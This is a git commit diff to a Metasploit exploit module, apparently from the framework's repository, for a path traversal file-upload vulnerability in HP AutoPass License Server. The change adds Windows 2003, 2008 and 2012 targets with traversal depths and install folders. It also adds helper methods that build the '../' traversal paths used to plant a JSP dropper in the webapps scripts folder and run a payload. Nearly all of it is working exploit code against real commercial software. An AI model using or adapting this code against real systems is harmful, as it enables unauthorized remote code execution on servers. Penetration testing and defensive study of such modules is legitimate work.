Land #3531 - Windows 2008 Update for HP AutoPass License

2014-07-16 15:13:05 -05:00 · 2014-07-16 15:13:05 -05:00 · 8733dcb2f8
parent 0ef1f56163 6d05a24653
commit 8733dcb2f8
1 changed files with 69 additions and 8 deletions
--- a/modules/exploits/windows/http/hp_autopass_license_traversal.rb
+++ b/modules/exploits/windows/http/hp_autopass_license_traversal.rb
@ -6,7 +6,7 @@
 require 'msf/core'

 class Metasploit3 < Msf::Exploit::Remote
-  Rank = ExcellentRanking
+  Rank = GreatRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper
@ -40,7 +40,34 @@ class Metasploit3 < Msf::Exploit::Remote
      'Arch'        => ARCH_JAVA,
      'Targets'     =>
        [
-          ['HP AutoPass License Server 8.01 / HP Service Virtualization 3.50', {}]
+          ['Windows 2003 SP2 / HP AutoPass License Server 8.01 / HP Service Virtualization 3.50',
+            {
+              'InstallDepth' => 4,
+              'InstallFolder' => '/HP AutoPass License Server/HP AutoPass License Server',
+              'WebappsDepth' => 1
+            }
+          ],
+          ['Windows 2008 32 bits/ HP AutoPass License Server 8.01 / HP Service Virtualization 3.50',
+            {
+              'InstallDepth' => 7,
+              'InstallFolder' => '/Program Files/HP/HP AutoPass License Server/HP AutoPass License Server/HP AutoPass License Server',
+              'WebappsDepth' => 1
+            }
+          ],
+          ['Windows 2008 64 bits/ HP AutoPass License Server 8.01 / HP Service Virtualization 3.50',
+           {
+               'InstallDepth' => 7,
+               'InstallFolder' => '/Program Files (x86)/HP/HP AutoPass License Server/HP AutoPass License Server/HP AutoPass License Server',
+               'WebappsDepth' => 1
+           }
+          ],
+          ['Windows 2012 / HP AutoPass License Server 8.01 / HP Service Virtualization 3.50',
+            {
+              'InstallDepth' => 4,
+              'InstallFolder' => '/HP AutoPass License Server/HP AutoPass License Server',
+              'WebappsDepth' => 1
+            }
+          ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jan 10 2014'))
@ -48,9 +75,14 @@ class Metasploit3 < Msf::Exploit::Remote
    register_options(
      [
        Opt::RPORT(5814),
-        OptString.new('TARGETURI', [true, 'Path to HP AutoPass License Server Application', '/autopass']),
-        OptInt.new('INSTALL_DEPTH', [true, 'Traversal Depth to reach the HP AutoPass License Server folder', 4]),
-        OptInt.new('WEBAPPS_DEPTH', [true, 'Traversal Depth to reach the Tomcat webapps folder', 1])
+        OptString.new('TARGETURI', [true, 'Path to HP AutoPass License Server Application', '/autopass'])
+      ], self.class)
+
+    register_advanced_options(
+      [
+        OptInt.new('INSTALL_DEPTH', [false, 'Traversal Depth to reach the HP AutoPass License Server folder']),
+        OptString.new('INSTALL_FOLDER', [false, 'HP AutoPass License Server folder']),
+        OptInt.new('WEBAPPS_DEPTH', [false, 'Traversal Depth to reach the Tomcat webapps folder'])
      ], self.class)
  end

@ -99,7 +131,8 @@ class Metasploit3 < Msf::Exploit::Remote
    # In order to execute it, through the AutoPass application we would like to drop it here:
    # C:\Program Files\HP\HP AutoPass License Server\HP AutoPass License Server\HP AutoPass License Server\webapps\autopass\scripts
    dropper_traversal = install_traversal
-    dropper_traversal << "/HP AutoPass License Server/HP AutoPass License Server/webapps/autopass/scripts/#{dropper_filename}"
+    dropper_traversal << "#{install_folder}/webapps/autopass/scripts/#{dropper_filename}"
+
    res = upload_file(dropper_traversal, dropper)

    register_files_for_cleanup("#{webapps_traversal}webapps/autopass/scripts/#{dropper_filename}")
@ -140,11 +173,39 @@ class Metasploit3 < Msf::Exploit::Remote
  end

  def webapps_traversal
-    "../" * datastore['WEBAPPS_DEPTH']
+    if datastore['WEBAPPS_DEPTH'] > 0
+      depth = datastore['WEBAPPS_DEPTH']
+    elsif target['WebappsDepth']
+      depth = target['WebappsDepth']
+    else
+      depth = 1
+    end
+
+    "../" * depth
  end

  def install_traversal
-    "/.." * datastore['INSTALL_DEPTH']
+    if datastore['INSTALL_DEPTH'] > 0
+      depth = datastore['INSTALL_DEPTH']
+    elsif target['InstallDepth']
+      depth = target['InstallDepth']
+    else
+      depth = 4
+    end
+
+    "/.." * depth
+  end
+
+  def install_folder
+    if !datastore['INSTALL_FOLDER'].blank?
+      folder = datastore['INSTALL_FOLDER']
+    elsif target['InstallFolder']
+      folder = target['InstallFolder']
+    else
+      folder = "/HP AutoPass License Server/HP AutoPass License Server"
+    end
+
+    folder
  end

  # Using a JSP dropper because the vulnerability doesn't allow to upload